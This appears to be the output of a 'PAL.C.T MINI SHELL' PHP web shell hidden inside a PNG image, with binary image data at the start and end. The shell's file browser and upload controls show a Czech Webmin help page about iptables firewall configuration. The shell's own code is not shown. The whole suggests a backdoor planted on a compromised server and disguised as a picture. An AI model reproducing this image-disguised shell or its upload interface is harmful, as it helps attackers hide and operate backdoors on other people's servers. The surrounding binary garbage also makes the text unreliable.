php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/firewall/help/
upload
files >> //usr/libexec/webmin/firewall/help/intro.cs.auto.html

<header> Linux Firewall </header><h3> Úvod do modulu </h3> Tento modul umožňuje konfigurovat funkce brány firewall IPtables, které jsou obsaženy v linuxových jádrech řady 2.4. Na rozdíl od některých jiných konfiguračních programů brány firewall namísto vytváření skriptu prostředí, který firewall nastavuje, čte a upravuje <tt>ukládací</tt> soubor ve formátu, který čte a zapisuje <tt>tabulka ipi (6) tables-restore</tt> a <tt>ipi (6) tables-save</tt> . <p> Pokud již máte v systému firewall, který byl nastaven ručně nebo ze souboru skriptu, modul nabídne převod do souboru IPtables pro uložení a vytvoří skript, který bude spuštěn v době spuštění a aktivuje pravidla v soubor. Pokud to však uděláte, neměli byste již upravovat skript pravidel brány firewall a měli byste jej také zakázat v době spuštění. <p><h3> Přehled IPtables </h3> Každý síťový paket, který přichází, vychází z vašeho systému nebo je přeposílá, je zkontrolován proti jednomu nebo více řetězcům, aby se určilo, co se s ním stane. Každý řetězec obsahuje nula nebo více pravidel, z nichž každé má podmínku (pro určení, které pakety se shoduje) a akci (pro řízení toho, co se stane těmto odpovídajícím paketům). Každý řetězec má také výchozí akci, která řídí, co se stane s pakety, které neodpovídají žádnému pravidlu. <p> Každý řetězec je součástí tabulky, z nichž v současné době existují tři: <ul><li> <b>Filtrování paketů ( <tt>filtr</tt> )</b> <br> Řetězy v této tabulce lze použít k řízení dat přicházejících do vašeho systému od ostatních hostitelů v síti, dat odesílaných z vašeho systému uživateli a procesy a dat předávaných vaším systémem, pokud jedná jako router. <p><li> <b>Překlad síťových adres ( <tt>nat</tt> )</b> <br> Tato tabulka může být použita pro nastavení NAT nebo maskování, což je užitečné, pokud chcete dát celé síti strojů přístup k internetu pouze přes jednu skutečnou IP adresu. <p><li> <b>Změna paketu ( <tt>mangle</tt> )</b> <br> Tato tabulka slouží k úpravě paketů předaných nebo odeslaných z vašeho systému. <p></ul> Kromě standardních řetězců, které jsou součástí každé tabulky, si také můžete vytvořit vlastní řetězce, které lze spouštět podle pravidel v zabudovaných řetězcích. To může být užitečné pro seskupování a sdílení pravidel, která mohou být použita na více místech. <p><h3> Hlavní stránka </h3> Na hlavní stránce tohoto modulu jsou uvedeny všechny řetězce a pravidla z jedné z dostupných tabulek vybraných ze seznamu v levém horním rohu. Níže je oddíl pro každý řetězec v aktuální tabulce, se všemi pravidly v každém řetězci uvedenými a jejich podmínkami popsanými podle nejlepších schopností modulu. Pro každý řetězec můžete změnit výchozí akci pomocí rozevíracího seznamu, pokud je řetězec jedním z vestavěných pro tabulku, nebo jej odstranit pomocí tlačítka Odstranit řetězec, pokud je definován uživatelem. <p> Můžete kliknout na libovolné pravidlo v řetězci a upravit jej, kliknutím na šipky napravo od každého řádku jej přesunout nahoru nebo dolů, nebo kliknutím na tlačítko Přidat pravidlo přidat nové. Přidáním nebo úpravou pravidla se dostanete na stránku, na které můžete vybrat akci pro každé pravidlo a podmínky, pro které je akce provedena. <p> Ve spodní části stránky je tlačítko pro <tt>aktivaci</tt> aktuální konfigurace firewallu načtením do jádra pomocí příkazu <tt>ipi (6) tables-restore</tt> . Pod ním je tlačítko pro provádění zpětného chodu - převzetí konfigurace, která je aktuálně v jádře a její zpřístupnění pro úpravy. A konečně, pokud to vaše distribuce podporuje, je zde tlačítko pro změnu, zda je firewall aktivován v době spuštění nebo ne. <p><h3> Filtrační řetězy </h3> Pro lepší spolupráci s externími iptables skripty můžete vyloučit jednotlivé řetězce ze zpracování firewallem. Chcete-li to provést, musíte v nastavení vybrat přímé zpracování pravidel a zadat seznam filtrů, který vyloučí příslušné řetězce ze zpracování. Řetězy, které nejsou vyřazeny z úprav, jsou označeny zprávou „neřízeno pomocí brány firewall“. <p><h3> IP sady </h3> Novější verze tabulky ip (6) podporují rozšíření ipset. IP sady jsou seznamy IP adres v hlavní paměti, které lze velmi efektivně prohledávat a používat jako podmínku v pravidlech. Na hlavní stránce jsou zobrazeny existující sady IP, které lze použít podle pravidel. V současné době však není možné tyto spravovat ve firewallu. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`